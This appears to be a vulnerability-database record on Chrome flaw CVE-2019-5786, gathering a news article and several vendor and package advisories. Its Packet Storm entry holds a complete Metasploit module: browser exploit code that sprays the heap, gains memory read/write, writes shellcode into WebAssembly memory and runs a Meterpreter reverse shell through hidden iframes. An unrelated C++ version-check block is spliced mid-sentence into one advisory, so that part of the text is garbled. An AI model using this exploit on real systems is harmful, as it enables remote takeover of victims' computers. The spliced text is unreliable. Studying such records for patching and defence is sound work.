\n \nIf you are unaware, Google last week released a [critical update for Chrome](<https://thehackernews.com/2019/03/update-google-chrome-hack.html>) web browser to address a high-severity flaw (CVE-2019-5786) that attackers found exploiting in combination with a Windows vulnerability ([CVE-2019-0808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808>)). \n \nSuccessful exploitation of both flaws together allowed remote attackers to execute arbitrary code on targeted computers running Windows 7 or Server 2008 and take full control of them. \n \nThe second zero-day elevation of privilege vulnerability in Windows, assigned as [CVE-2019-0797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797>), that's also being exploited in the wild is similar to the first one but affects Windows 10, 8.1, Server 2012, 2016, and 2019. \n \nThis flaw was detected and reported to Microsoft by security researchers Vasily Berdnikov and Boris Larin of Kaspersky Labs, who in a [blog post](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) today revealed that the flaw has actively been exploited in targeted attacks by several threat actors including, FruityArmor and SandCat. \n\n\n> \"CVE-2019-0797 is a race condition that is present in the win32k driver due to a lack of proper synchronization between undocumented syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection,\" the researchers say.\n\n \n\n\n## Update Also Patches 17 Critical and 45 Important Flaws\n\n \nAs expected, almost all of the listed critical-rated vulnerabilities lead to remote code execution attacks and primarily impact various versions of Windows 10 and Server editions. Most of these flaws reside in Chakra Scripting Engine, VBScript Engine, DHCP Client, and IE. 
\n \nWhile some of the important-rated vulnerabilities also lead to remote code execution attacks, others allow elevation of privilege, information disclosure, and denial of service attacks. \n\n\n \nUsers and system administrators are strongly recommended to apply the latest security patches as soon as possible to keep hackers and cybercriminals away from taking control of their systems. \n \nFor installing the latest security patch updates, head on to Settings \u2192 Update & Security \u2192 Windows Update \u2192 Check for updates, on your computer system or you can install the updates manually. \n \n\n\n#### Windows 10 Now Automatically Uninstalls Updates That Cause Problems\n\n \nFor addressing problematic update issues on Windows 10 devices, Microsoft on Monday introduced a safety measure that [automatically uninstalls buggy software](<https://thehackernews.com/2019/03/windows-buggy-updates.html>) updates installed on your system if your operating system detects a startup failure. \n \nSo after installing this month\u2019s security update, if you receive the following notification on your device, your Windows 10 computer has been recovered from a startup failure, and the operating system resolved the failure by uninstalling recently installed Windows updates. \n\n\n> \"We removed some recently installed updates to recover your device from a startup failure.\"\n\nWindows 10 will then automatically block installation of that problematic updates for the next 30 days, and will deliver the update again after investigating and fixing the issue. \n \nAdobe also rolled out security updates today to fix just two critical arbitrary code execution [vulnerabilities in Adobe Photoshop CC](<https://thehackernews.com/2019/03/adobe-software-updates.html>) and another in Adobe Digital Editions. Users of the affected Adobe software for Windows and macOS are advised to update their software packages to the latest versions. \n\n\nHave something to say about this article? 
Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2019-03-29T17:27:27", "published": "2019-03-12T18:15:00", "id": "THN:04C2B4D392A1C67EF52FAF0D2CFA9E55", "href": "https://thehackernews.com/2019/03/microsoft-windows-security-updates.html", "type": "thn", "title": "Microsoft Releases Patches for 64 Flaws \u2014 Two Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2019-03-08T03:54:54", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated: to 72.0.3626.121:\n\n * CVE-2019-5786: Use-after-free in FileReader fixed (boo#1127602)\n * Feature fixes update only\n\n", "edition": 1, "modified": "2019-03-08T00:09:19", "published": "2019-03-08T00:09:19", "id": "OPENSUSE-SU-2019:0298-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00010.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-5786"], "description": "### *Detect date*:\n03/01/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nUse-after-free vulnerability was found in FileReader component of Google Chrome. 
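The advisories on this page all put the fix at 72.0.3626.121 (Debian ships it as 72.0.3626.122-1~deb9u1), so a fleet check comes down to comparing version strings correctly: numerically, component by component, with packaging suffixes stripped. The following is an added example in C++, not code from any of the advisories; the host inventory it runs over is constructed.

```cpp
// Added example: numeric version comparison for deciding which hosts in a
// fleet still run a Chrome/Chromium older than the fixed release. Not taken
// from any advisory on this page; the inventory below is constructed.
#include <algorithm>
#include <cctype>
#include <cstdio>
#include <string>
#include <utility>
#include <vector>

// First Chrome release carrying the fix, as named by the advisories above.
static const char* const kFixedVersion = "72.0.3626.121";

// Parses the leading dotted numeric part of a version string. Distribution
// suffixes such as "-1~deb9u1" (Debian) or "-1" (Arch) are ignored, so the
// comparison is made on the upstream Chromium version only.
std::vector<unsigned long> parse_version(const std::string& v) {
    std::vector<unsigned long> parts;
    unsigned long cur = 0;
    bool in_number = false;
    for (char c : v) {
        if (std::isdigit(static_cast<unsigned char>(c))) {
            cur = cur * 10 + static_cast<unsigned long>(c - '0');
            in_number = true;
        } else if (c == '.' && in_number) {
            parts.push_back(cur);
            cur = 0;
            in_number = false;
        } else {
            break;   // anything else ends the upstream version
        }
    }
    if (in_number) parts.push_back(cur);
    return parts;
}

// Component-wise numeric comparison: -1, 0 or 1. Missing trailing components
// count as 0, so "72.0" equals "72.0.0.0". Plain string comparison would put
// "72.0.3626.99" after "72.0.3626.121", which is the pitfall this avoids.
int compare_versions(const std::string& a, const std::string& b) {
    std::vector<unsigned long> pa = parse_version(a), pb = parse_version(b);
    size_t n = std::max(pa.size(), pb.size());
    for (size_t i = 0; i < n; i++) {
        unsigned long x = i < pa.size() ? pa[i] : 0;
        unsigned long y = i < pb.size() ? pb[i] : 0;
        if (x != y) return x < y ? -1 : 1;
    }
    return 0;
}

// True when the reported version predates the fix. An empty or unparseable
// string compares as 0.0.0.0 and is therefore flagged: fail closed rather than
// silently passing a host whose agent reported nothing useful.
bool chrome_is_vulnerable(const std::string& version) {
    return compare_versions(version, kFixedVersion) < 0;
}

// Returns the names of hosts whose reported version still needs the update.
std::vector<std::string> hosts_needing_update(
        const std::vector<std::pair<std::string, std::string>>& inventory) {
    std::vector<std::string> out;
    for (const auto& entry : inventory)
        if (chrome_is_vulnerable(entry.second)) out.push_back(entry.first);
    return out;
}

// Constructed sample inventory: (hostname, version reported by the endpoint agent).
const std::vector<std::pair<std::string, std::string>> kSampleInventory = {
    {"ws-01", "72.0.3626.119"},            // the release the exploit module targets
    {"ws-02", "72.0.3626.121"},            // fixed
    {"ws-03", "72.0.3626.99"},             // older, but sorts after .121 as a string
    {"srv-deb", "72.0.3626.122-1~deb9u1"}, // Debian's fixed package
    {"ws-04", "73.0.3683.75"},             // later stable release
    {"ws-05", ""},                         // agent reported nothing
};

int main() {
    for (const std::string& h : hosts_needing_update(kSampleInventory))
        std::printf("%s needs update\n", h.c_str());
    return 0;
}
```

Feed it whatever your endpoint agent reports; hosts with an empty or unparseable version are listed as needing attention rather than silently passing.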
Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome earlier than 72.0.3626.121\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>)0.0Unknown\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).", "edition": 4, "modified": "2020-06-18T00:00:00", "published": "2019-03-01T00:00:00", "id": "KLA11430", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11430", "title": "\r KLA11430ACE vulnerability in Google Chrome ", "type": "kaspersky", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-02T11:45:14", "bulletinFamily": "info", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787"], "description": "### *Detect date*:\n03/12/2019\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, bypass security restrictions or spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 73.0.3683.75\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop_12.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-5786](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5786>)0.0Unknown \n[CVE-2019-5802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5802>)0.0Unknown \n[CVE-2019-5791](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5791>)0.0Unknown \n[CVE-2019-5801](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5801>)0.0Unknown \n[CVE-2019-5798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5798>)0.0Unknown \n[CVE-2019-5787](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5787>)0.0Unknown \n[CVE-2019-5792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5792>)0.0Unknown \n[CVE-2019-5793](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5793>)0.0Unknown \n[CVE-2019-5800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5800>)0.0Unknown \n[CVE-2019-5804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5804>)0.0Unknown \n[CVE-2019-5803](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5803>)0.0Unknown \n[CVE-2019-5788](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5788>)0.0Unknown 
\n[CVE-2019-5790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5790>)0.0Unknown \n[CVE-2019-5799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5799>)0.0Unknown \n[CVE-2019-5789](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5789>)0.0Unknown \n[CVE-2019-5794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5794>)0.0Unknown \n[CVE-2019-5796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5796>)0.0Unknown \n[CVE-2019-5795](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5795>)0.0Unknown \n[CVE-2019-5797](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5797>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-12T00:00:00", "id": "KLA11436", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11436", "title": "\r KLA11436Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-08-12T01:02:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5786"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4404-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nMarch 09, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium\nCVE ID : CVE-2019-5786\n\nClement Lecigne discovered a use-after-free issue in chromium's file\nreader implementation. A maliciously crafted file could be used to\nremotely execute arbitrary code because of this problem.\n\nThis update also fixes a regression introduced in a previous update. 
The\nbrowser would always crash when launched in remote debugging mode.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 72.0.3626.122-1~deb9u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-03-10T04:09:57", "published": "2019-03-10T04:09:57", "id": "DEBIAN:DSA-4404-1:0557C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00048.html", "title": "[SECURITY] [DSA 4404-1] chromium security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2019-05-10T19:45:08", "description": "", "published": "2019-05-08T00:00:00", "type": "packetstorm", "title": "Chrome 72.0.3626.119 FileReader Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-5786"], "modified": "2019-05-08T00:00:00", "id": "PACKETSTORM:152772", "href": "https://packetstormsecurity.com/files/152772/Chrome-72.0.3626.119-FileReader-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86', \n'Description' => %q{ \nThis exploit takes advantage of a use after free vulnerability in Google \nChrome 72.0.3626.119 running on Windows 7 x86. 
\nThe FileReader.readAsArrayBuffer function can return multiple references to the \nsame ArrayBuffer object, which can be freed and overwritten with sprayed objects. \nThe dangling ArrayBuffer reference can be used to access the sprayed objects, \nallowing arbitrary memory access from Javascript. This is used to write and \nexecute shellcode in a WebAssembly object. \nThe shellcode is executed within the Chrome sandbox, so you must explicitly \ndisable the sandbox for the payload to be successful. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Clement Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # Exodus Intel \n'timwr', # metasploit module \n], \n'References' => [ \n['CVE', '2019-5786'], \n['URL', 'https://github.com/exodusintel/CVE-2019-5786'], \n['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'], \n['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'], \n['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'], \n], \n'Arch' => [ ARCH_X86 ], \n'Platform' => 'windows', \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }, \n'Targets' => [ [ 'Automatic', { } ] ], \n'DisclosureDate' => 'Mar 21 2019')) \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"Sending #{request.uri}\") \nif request.uri =~ %r{/exploit.html$} \nhtml = %Q^ \n<html> \n<head> \n<script> \nlet myWorker = new Worker('worker.js'); \nlet reader = null; \nspray = null; // nested arrays used to hold the sprayed heap contents \nlet onprogress_cnt = 0; // number of times onprogress was called in a round \nlet try_cnt = 0; // number of rounds we tried \nlet last = 0, lastlast = 0; // last two AB results from the read \nlet tarray = 0; // TypedArray constructed from the dangling ArrayBuffer \nconst string_size = 128 * 1024 * 1024; \nlet contents = String.prototype.repeat.call('Z', string_size); \nlet f = 
new File([contents], \"text.txt\"); \nconst marker1 = 0x36313233; \nconst marker2 = 0x37414546; \n \nconst outers = 256; \nconst inners = 1024; \n \nfunction allocate_spray_holders() { \nspray = new Array(outers); \nfor (let i = 0; i < outers; i++) { \nspray[i] = new Array(inners); \n} \n} \n \nfunction clear_spray() { \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j < inners; j++) { \nspray[i][j] = null; \n} \n} \n} \n \nfunction reclaim_mixed() { \n// spray the heap to reclaim the freed region \nlet tmp = {}; \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j + 2 < inners; j+=3) { \nspray[i][j] = {a: marker1, b: marker2, c: tmp}; \nspray[i][j].c = spray[i][j] // self-reference to find our absolute address \nspray[i][j+1] = new Array(8); \nspray[i][j+2] = new Uint32Array(32); \n} \n} \n} \n \nfunction find_pattern() { \nconst start_offset = 0x00afc000 / 4; \nfor (let i = start_offset; i + 1 < string_size / 4; i++) { \nif (i < 50){ \nconsole.log(tarray[i].toString(16)); \n} \n// multiply by two because of the way SMIs are stored \nif (tarray[i] == marker1 * 2) { \nif (tarray[i+1] == marker2 * 2) { \nconsole.log(`found possible candidate objectat idx ${i}`); \nreturn i; \n} \n} \n} \nreturn null; \n} \n \n \nfunction get_obj_idx(prop_idx) { \n// find the index of the Object in the spray array \ntarray[prop_idx] = 0x62626262; \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j < inners; j+=1) { \ntry { \nif (spray[i][j].a == 0x31313131) { \nconsole.log(`found object idx in the spray array: ${i} ${j}`); \nreturn spray[i][j]; \n} \n} catch (e) {} \n} \n} \n} \n \nfunction ta_read(addr) { \n// reads an absolute address through the original freed region \n// only works for ta_absolute_addr + string_size (128MiB) \nif (addr > ta_absolute_addr && addr < ta_absolute_addr + string_size) { \nreturn tarray[(addr-ta_absolute_addr)/4]; \n} \n \nreturn 0; \n} \n \nfunction ta_write(addr, value) { \n// wrtie to an absolute address through the original freed 
region \n// only works for ta_absolute_addr + string_size (128MiB) \nif (addr % 4 || value > 2**32 - 1 || \naddr < ta_absolute_addr || \naddr > ta_absolute_addr + string_size) { \nconsole.log(`invalid args passed to ta_write(${addr.toString(16)}, ${value}`); \n} \ntarray[(addr-ta_absolute_addr)/4] = value; \n} \n \nfunction get_corruptable_ui32a() { \n// finds a sprayed Uint32Array, the elements pointer of which also falls into the controlled region \nfor (let i = 0; i < outers; i++) { \nfor (let j = 0; j + 2 < inners; j+=3) { \nlet ui32a_addr = addrof(spray[i][j+2]) - 1; \nlet bs_addr = ta_read(ui32a_addr + 12) - 1; \nlet elements_addr = ta_read(ui32a_addr + 8) - 1; \n// read its elements pointer \n// if the elements ptr lies inside the region we have access to \nif (bs_addr >= ta_absolute_addr && bs_addr < ta_absolute_addr + string_size && \nelements_addr >= ta_absolute_addr && elements_addr < ta_absolute_addr + string_size) { \nconsole.log(`found corruptable Uint32Array->elements at ${bs_addr.toString(16)}, on Uint32Array idx ${i} ${j}`); \nreturn { \nbs_addr: bs_addr, \nelements_addr: elements_addr, \nui32: spray[i][j+2], \ni: i, j: j \n} \n} \n} \n} \n} \n \nvar reader_obj = null; \nvar object_prop_taidx = null; \nvar ta_absolute_addr = null; \nvar aarw_ui32 = null; \n \nfunction addrof(leaked_obj) { \nreader_obj.a = leaked_obj; \nreturn tarray[object_prop_taidx]; \n} \n \n \nfunction read4(addr) { \n// save the old values \nlet tmp1 = ta_read(aarw_ui32.elements_addr + 12); \nlet tmp2 = ta_read(aarw_ui32.bs_addr + 16); \n \n// rewrite the backing store ptr \nta_write(aarw_ui32.elements_addr + 12, addr); \nta_write(aarw_ui32.bs_addr + 16, addr); \n \nlet val = aarw_ui32.ui32[0]; \n \nta_write(aarw_ui32.elements_addr + 12, tmp1); \nta_write(aarw_ui32.bs_addr + 16, tmp2); \n \nreturn val; \n} \n \nfunction write4(addr, val) { \n// save the old values \nlet tmp1 = ta_read(aarw_ui32.elements_addr + 12); \nlet tmp2 = ta_read(aarw_ui32.bs_addr + 16); \n \n// rewrite 
the backing store ptr \nta_write(aarw_ui32.elements_addr + 12, addr); \nta_write(aarw_ui32.bs_addr + 16, addr); \n \naarw_ui32.ui32[0] = val; \n \nta_write(aarw_ui32.elements_addr + 12, tmp1); \nta_write(aarw_ui32.bs_addr + 16, tmp2); \n} \n \nfunction get_rw() { \n// free up as much memory as possible \n// spray = null; \n// contents = null; \nforce_gc(); \n \n// attempt reclaiming the memory pointed to by the dangling pointer \nreclaim_mixed(); \n \n// access the reclaimed region as a Uint32Array \ntarray = new Uint32Array(lastlast); \nobject_prop_taidx = find_pattern(); \nif (object_prop_taidx === null) { \nconsole.log('ERROR> failed to find marker'); \nwindow.top.postMessage(`ERROR> failed to find marker`, '*'); \nreturn; \n} \n \n// leak the absolute address of the Object \nconst obj_absolute_addr = tarray[object_prop_taidx + 2] - 1; // the third property of the sprayed Object is self-referential \nta_absolute_addr = obj_absolute_addr - (object_prop_taidx-3)*4 \nconsole.log(`leaked absolute address of our object ${obj_absolute_addr.toString(16)}`); \nconsole.log(`leaked absolute address of ta ${ta_absolute_addr.toString(16)}`); \n \nreader_obj = get_obj_idx(object_prop_taidx); \nif (reader_obj == undefined) { \nconsole.log(`ERROR> failed to find object`); \nwindow.top.postMessage(`ERROR> failed to find object`, '*'); \nreturn; \n} \n// now reader_obj is a reference to the Object, object_prop_taidx is the index of its first inline property from the beginning of tarray \n \nconsole.log(`addrof(reader_obj) == ${addrof(reader_obj)}`); \naarw_ui32 = get_corruptable_ui32a(); \n// arbitrary read/write is available after this point \n} \n \nvar wfunc = null; \nlet meterpreter = unescape(\"#{Rex::Text.to_unescape(payload.encoded)}\"); \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => console.log(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 
0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \nwfunc = wasm_func; \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func) - 1; \nlet sfi = read4(wasm_func_addr + 12) - 1; \nlet WasmExportedFunctionData = read4(sfi + 4) - 1; \nlet instance = read4(WasmExportedFunctionData + 8) - 1; \nlet rwx_addr = read4(instance + 0x74); \n \n// write the shellcode to the RWX page \nif (meterpreter.length % 2 != 0) \nmeterpreter += \"\\\\u9090\"; \n \nfor (let i = 0; i < meterpreter.length; i += 2) { \nwrite4(rwx_addr + i*2, meterpreter.charCodeAt(i) + meterpreter.charCodeAt(i + 1) * 0x10000); \n} \n \n// if we got to this point, the exploit was successful \nwindow.top.postMessage('SUCCESS', '*'); \nconsole.log('success'); \nwfunc(); \n \n// invoke the shellcode \n//window.setTimeout(wfunc, 1000); \n} \n \nfunction force_gc() { \n// forces a garbage collection to avoid OOM kills \ntry { \nvar failure = new WebAssembly.Memory({initial: 32767}); \n} catch(e) { \n// console.log(e.message); \n} \n} \n \nfunction init() { \nabs = []; \ntarray = 0; \nonprogress_cnt = 0; \ntry_cnt = 0; \nlast = 0, lastlast = 0; \nreader = new FileReader(); \n \nreader.onloadend = function(evt) { \ntry_cnt += 1; \nfailure = false; \nif (onprogress_cnt < 2) { \nconsole.log(`less than 2 onprogress events triggered: ${onprogress_cnt}, try again`); \nfailure = true; \n} \n \nif (lastlast.byteLength != f.size) { \nconsole.log(`lastlast has a different size than expected: 
${lastlast.byteLength}`); \nfailure = true; \n} \n \nif (failure === true) { \nconsole.log('retrying in 1 second'); \nwindow.setTimeout(exploit, 1); \nreturn; \n} \n \nconsole.log(`onloadend attempt ${try_cnt} after ${onprogress_cnt} onprogress callbacks`); \ntry { \n// trigger the FREE \nmyWorker.postMessage([last], [last, lastlast]); \n} catch(e) { \n// an exception with this message indicates that the FREE part of the exploit was successful \nif (e.message.includes('ArrayBuffer at index 1 could not be transferred')) { \nget_rw(); \nrce(); \nreturn; \n} else { \nconsole.log(e.message); \n} \n} \n} \nreader.onprogress = function(evt) { \nforce_gc(); \nlet res = evt.target.result; \n// console.log(`onprogress ${onprogress_cnt}`); \nonprogress_cnt += 1; \nif (res.byteLength != f.size) { \n// console.log(`result has a different size than expected: ${res.byteLength}`); \nreturn; \n} \nlastlast = last; \nlast = res; \n} \nif (spray === null) { \n// allocate the spray holders if needed \nallocate_spray_holders(); \n} \n \n// clear the spray holder arrays \nclear_spray(); \n \n// get rid of the reserved ArrayBuffer range, as it may interfere with the exploit \ntry { \nlet failure = new ArrayBuffer(1024 * 1024 * 1024); \n} catch (e) { \nconsole.log(e.message); \n} \n \nforce_gc(); \n} \n \nfunction exploit() { \ninit(); \nreader.readAsArrayBuffer(f); \nconsole.log(`attempt ${try_cnt} started`); \n} \n</script> \n</head> \n<body onload=\"exploit()\"> \n</body> \n</html> \n^ \nsend_response(cli, html) \nelsif request.uri =~ %r{/worker.js$} \nsend_response(cli, 'onmessage = function (msg) { }') \nelse \nuripath = datastore['URIPATH'] || get_resource \nuripath += '/' unless uripath.end_with? 
'/' \nhtml = %Q^ \n<html> \n<head> \n<script> \nfunction iter() { \nlet iframe = null; \ntry { \niframe = document.getElementById('myframe'); \ndocument.body.removeChild(iframe); \n} catch (e) {} \n \niframe = document.createElement('iframe'); \niframe.src = '#{uripath}exploit.html'; \niframe.id = 'myframe'; \niframe.style = \"width:0; height:0; border:0; border:none; visibility=hidden\" \ndocument.body.appendChild(iframe); \nconsole.log(document.getElementById('myframe')); \n} \n \nfunction brute() { \nwindow.setTimeout(iter, 1000); \nlet interval = window.setInterval(iter, 15000); \n \nwindow.onmessage = function(e) { \nif (e.data.includes('SUCCESS')) { \nconsole.log('exploit successful!'); \nwindow.clearInterval(interval); \n} \nconsole.log(e); \n} \n} \n</script> \n</head> \n<body onload=\"brute()\"></body> \n</html> \n^ \nsend_response(cli, html) \nend \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152772/chrome_filereader_uaf.rb.txt"}], "nodejs": [{"lastseen": "2020-09-29T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2019-5786"], "description": "## Overview\n\nVersions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). 
The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.\n\n## References\n\n- [GitHub Issue](https://github.com/GoogleChrome/puppeteer/issues/4141)\n- [Snyk Report](https://snyk.io/vuln/SNYK-JS-PUPPETEER-174321)\n- [CVE-2019-5786 Analysis by Exodus Intelligence](https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/)", "modified": "2019-04-19T21:33:38", "published": "2019-04-19T21:33:38", "id": "NODEJS:824", "href": "https://www.npmjs.com/advisories/824", "type": "nodejs", "title": "Use-After-Free", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2020-09-02T21:31:23", "bulletinFamily": "software", "cvelist": ["CVE-2019-5786"], "description": "Versions of `puppeteer` prior to 1.13.0 are vulnerable to the Use-After-Free vulnerability in Chromium (CVE-2019-5786). The Chromium FileReader API is vulnerable to Use-After-Free which may lead to Remote Code Execution.\n\n\n## Recommendation\n\nUpgrade to version 1.13.0 or later.", "edition": 1, "modified": "2020-09-02T18:25:43", "published": "2020-09-02T18:25:43", "id": "GHSA-C2GP-86P4-5935", "href": "https://github.com/advisories/GHSA-c2gp-86p4-5935", "title": "Use-After-Free in puppeteer", "type": "github", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2019-05-08T23:59:07", "description": "This exploit takes advantage of a use after free vulnerability in Google Chrome 72.0.3626.119 running on Windows 7 x86. The FileReader.readAsArrayBuffer function can return multiple references to the same ArrayBuffer object, which can be freed and overwritten with sprayed objects. The dangling ArrayBuffer reference can be used to access the sprayed objects, allowing arbitrary memory access from Javascript. This is used to write and execute shellcode in a WebAssembly object. 
